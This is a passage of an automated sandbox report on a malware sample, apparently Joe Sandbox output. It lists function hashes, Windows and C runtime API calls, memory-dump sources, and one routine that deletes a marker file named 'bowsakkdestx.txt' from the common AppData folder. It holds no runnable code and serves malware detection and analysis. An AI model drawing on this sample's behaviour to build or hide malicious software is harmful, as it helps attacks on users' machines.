                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ClassCursorLoadRegister
                                                                                                  • String ID: 0$>W
                                                                                                  • API String ID: 1693014935-1072398759
                                                                                                  • Opcode ID: fb3d8665c90491ccd5e8439963c5620ff237f6760c3f0823fb1c41dacad51761
                                                                                                  • Instruction ID: 2af1901d3b9441401c5af66eef2a49e61f2a633f24bafb2eab91702749df8f17
                                                                                                  • Opcode Fuzzy Hash: fb3d8665c90491ccd5e8439963c5620ff237f6760c3f0823fb1c41dacad51761
                                                                                                  • Instruction Fuzzy Hash: ACF0AFB0C042189BEB00DF90D95979EBFB8BB08308F108149D8147A380D7BA1608CFD9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047C438
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047C44E
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0047C45B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendDeleteFileFolder
                                                                                                  • String ID: bowsakkdestx.txt
                                                                                                  • API String ID: 610490371-2616962270
                                                                                                  • Opcode ID: 310aafc71d5f832b581b6ab51b8336eee5427c191869fb69b9efc6320f91fe10
                                                                                                  • Instruction ID: e8a30104569926e889f8620b8395ee6346830ee98cf1a5e72dfe0c3b426caf4d
                                                                                                  • Opcode Fuzzy Hash: 310aafc71d5f832b581b6ab51b8336eee5427c191869fb69b9efc6320f91fe10
                                                                                                  • Instruction Fuzzy Hash: C2E08675A4031C67EB20ABA0DC8AFD57B7CEB14B01F004092BB48F21C0D6B0A5889B51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove_strtok
                                                                                                  • String ID:
                                                                                                  • API String ID: 3446180046-0
                                                                                                  • Opcode ID: 89dae81633425543ca8813dba757407ef782d25a00b9d09ea074cb7849ca41a1
                                                                                                  • Instruction ID: 73e6f30f393b25d082cba8826a1a803dbf2ca321ccecda5f747cd4333bfd4040
                                                                                                  • Opcode Fuzzy Hash: 89dae81633425543ca8813dba757407ef782d25a00b9d09ea074cb7849ca41a1
                                                                                                  • Instruction Fuzzy Hash: 0481AE70900206EFDF24DF59C9807DABBF1FF18304F108A6EE40957241D3BAAA54CB95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004AC6AD
                                                                                                  • __isleadbyte_l.LIBCMT ref: 004AC6DB
                                                                                                  • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000,?,00000000,00000000,?,004AC0ED,?,00BFBBEF,00000003), ref: 004AC709
                                                                                                  • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,00000000,?,004AC0ED,?,00BFBBEF,00000003), ref: 004AC73F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                  • String ID:
                                                                                                  • API String ID: 3058430110-0
                                                                                                  • Opcode ID: bfb791c214ec2bbfd15d3535018e25c246b41777338d96e6abe0d226c86351ea
                                                                                                  • Instruction ID: 338e9074cba2ef5583e2d4b2a31fbcb0daa0ebdf7d5d7a7985445b866cbc4b79
                                                                                                  • Opcode Fuzzy Hash: bfb791c214ec2bbfd15d3535018e25c246b41777338d96e6abe0d226c86351ea
                                                                                                  • Instruction Fuzzy Hash: 1731D034600246EFDB61CF35CC84BAB7BA9FF52310F15842AE4248B2A0E734E851DB98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • ___BuildCatchObject.LIBCMT ref: 005370AB
                                                                                                    • Part of subcall function 005377A0: ___BuildCatchObjectHelper.LIBCMT ref: 005377D2
                                                                                                    • Part of subcall function 005377A0: ___AdjustPointer.LIBCMT ref: 005377E9
                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 005370C2
                                                                                                  • ___FrameUnwindToState.LIBCMT ref: 005370D4
                                                                                                  • CallCatchBlock.LIBCMT ref: 005370F8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                  • String ID:
                                                                                                  • API String ID: 2901542994-0
                                                                                                  • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                  • Instruction ID: e2bceb813598ceba53c64755c7909ceeea72714113ea74c012f197180a6af263
                                                                                                  • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                  • Instruction Fuzzy Hash: C501C27280050ABBCF22AF55CC09EDA7FAAFF88754F158414F91866121D372E961EBA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 00495007: __getptd_noexit.LIBCMT ref: 00495008
                                                                                                    • Part of subcall function 00495007: __amsg_exit.LIBCMT ref: 00495015
                                                                                                  • __calloc_crt.LIBCMT ref: 00495A01
                                                                                                    • Part of subcall function 00498C96: __calloc_impl.LIBCMT ref: 00498CA5
                                                                                                  • __lock.LIBCMT ref: 00495A37
                                                                                                  • ___addlocaleref.LIBCMT ref: 00495A43
                                                                                                  • __lock.LIBCMT ref: 00495A57
                                                                                                    • Part of subcall function 00495208: __getptd_noexit.LIBCMT ref: 00495208
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                  • String ID:
                                                                                                  • API String ID: 2580527540-0
                                                                                                  • Opcode ID: 7b392d96794ceaa6f051ff1f36663cd44f171ac395bd2dbd3b75ab9e46a8da30
                                                                                                  • Instruction ID: c94b5610cf7c4debba226718279a0155267f7464b4ddc34256f79d16fea00ff1
                                                                                                  • Opcode Fuzzy Hash: 7b392d96794ceaa6f051ff1f36663cd44f171ac395bd2dbd3b75ab9e46a8da30
                                                                                                  • Instruction Fuzzy Hash: E1016D71541700ABEF21BFBA9442B097FA0AF81728F20426FF4559B282CE7849418B6D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                  • String ID:
                                                                                                  • API String ID: 3016257755-0
                                                                                                  • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                  • Instruction ID: 5bb6fd1531ae7dfc2234044eaeff691329d91f886883fc21e4b48ff161d2dc28
                                                                                                  • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                  • Instruction Fuzzy Hash: 0601437240014EBFCF125E85CC518EF3F62BB2D355F548856FE1954131D23AC9B2AB95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • lstrlenW.KERNEL32 ref: 004827B9
                                                                                                  • _malloc.LIBCMT ref: 004827C3
                                                                                                    • Part of subcall function 00490C62: __FF_MSGBANNER.LIBCMT ref: 00490C79
                                                                                                    • Part of subcall function 00490C62: __NMSG_WRITE.LIBCMT ref: 00490C80
                                                                                                    • Part of subcall function 00490C62: RtlAllocateHeap.NTDLL(01320000,00000000,00000001,00000001,?,?,?,004A0E81,00000001,00000000,?,?,?,004A0D1A,004BF284,?), ref: 00490CA5
                                                                                                  • _memset.LIBCMT ref: 004827CE
                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004827E4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2824100046-0
                                                                                                  • Opcode ID: ae84931f1e6fe3f7e982704557e287260e2a886c7e81f774cb372a5afffa9ae9
                                                                                                  • Instruction ID: 7593c8fcba5e168c5e9a269b398c28f62cadc1dd8100b60787104950c7b88ef6
                                                                                                  • Opcode Fuzzy Hash: ae84931f1e6fe3f7e982704557e287260e2a886c7e81f774cb372a5afffa9ae9
                                                                                                  • Instruction Fuzzy Hash: 3FF02736701205BBE72056659C4EFBB7A9DDB86764F100139F604F32C1E9516D0562F5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32 ref: 00482806
                                                                                                  • _malloc.LIBCMT ref: 00482814
                                                                                                    • Part of subcall function 00490C62: __FF_MSGBANNER.LIBCMT ref: 00490C79
                                                                                                    • Part of subcall function 00490C62: __NMSG_WRITE.LIBCMT ref: 00490C80
                                                                                                    • Part of subcall function 00490C62: RtlAllocateHeap.NTDLL(01320000,00000000,00000001,00000001,?,?,?,004A0E81,00000001,00000000,?,?,?,004A0D1A,004BF284,?), ref: 00490CA5
                                                                                                  • _memset.LIBCMT ref: 0048281F
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00482832
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2824100046-0
                                                                                                  • Opcode ID: c3fe4a39817083882662f8bd187343ae6ed2032b8b333f9dd950de4feb523c1a
                                                                                                  • Instruction ID: 4e5511fd4f3ebae683e85ba5c67672e925b3d5b7a221d4734597f6a0fe6670c0
                                                                                                  • Opcode Fuzzy Hash: c3fe4a39817083882662f8bd187343ae6ed2032b8b333f9dd950de4feb523c1a
                                                                                                  • Instruction Fuzzy Hash: C0E086763015247BE510236A6C4EFAB6E1CCBC27A5F100126F611E22D28A941C0592F4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  • Opcode ID: 28584a664c902c6ba3279da1eef22d915326799d183e01dcdb321ffa1117f897
                                                                                                  • Instruction ID: 5b2ecb49bf4bf0540f54d09f8398a4e2634638b0adf878ef253ad090d72784f6
                                                                                                  • Opcode Fuzzy Hash: 28584a664c902c6ba3279da1eef22d915326799d183e01dcdb321ffa1117f897
                                                                                                  • Instruction Fuzzy Hash: FBC13E7070010ADBCB28EF58D9C09AEB7B6FFC5304720492EE8468B655D738ED56CB99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: .\crypto\asn1\tasn_new.c
                                                                                                  • API String ID: 2102423945-2878120539
                                                                                                  • Opcode ID: b9cc522752fb18738d115b6527fe54771ba7d802094f6ddae7c858a57e917d6e
                                                                                                  • Instruction ID: 08512fce06b540cc15a1f63b867b58cc94bb16530ebb6e33b9cdfa7a32e7bd6f
                                                                                                  • Opcode Fuzzy Hash: b9cc522752fb18738d115b6527fe54771ba7d802094f6ddae7c858a57e917d6e
                                                                                                  • Instruction Fuzzy Hash: 7351E97174034527E7306EA7AC82F377798DF81B56F08042FFA2495282EADDD8848179
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  • Opcode ID: e066defd0462c94402e482f9d3e1eaf5943ac0e2eecc031f047efa0df83176e4
                                                                                                  • Instruction ID: 10d07275b61205207500a0fc34b546d8a563e20679d570b69daf21caec5b2184
                                                                                                  • Opcode Fuzzy Hash: e066defd0462c94402e482f9d3e1eaf5943ac0e2eecc031f047efa0df83176e4
                                                                                                  • Instruction Fuzzy Hash: 9351A1316041099BCF24EF18C9908BEB7A6FF85304B30896FE8158B351D739ED558BE9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0049AB93
                                                                                                  • ___raise_securityfailure.LIBCMT ref: 0049AC7A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                  • String ID: 8X
                                                                                                  • API String ID: 3761405300-86493873
                                                                                                  • Opcode ID: d532f22a1eeff77806994a0d62e0ffe8844caa7085484ccedfaac2a834867558
                                                                                                  • Instruction ID: 51775fe2c1587b6ad945dc20cc656e1a6c4b350c667da7af08a4110cb15e67fe
                                                                                                  • Opcode Fuzzy Hash: d532f22a1eeff77806994a0d62e0ffe8844caa7085484ccedfaac2a834867558
                                                                                                  • Instruction Fuzzy Hash: 292128B5501604CBD7D0DF55F9856063BE8BB68310F10782AED08AB7E0E3B0698DEF46
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00483CA0
                                                                                                    • Part of subcall function 00493B4C: _malloc.LIBCMT ref: 00493B64
                                                                                                  • _memset.LIBCMT ref: 00483C83
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
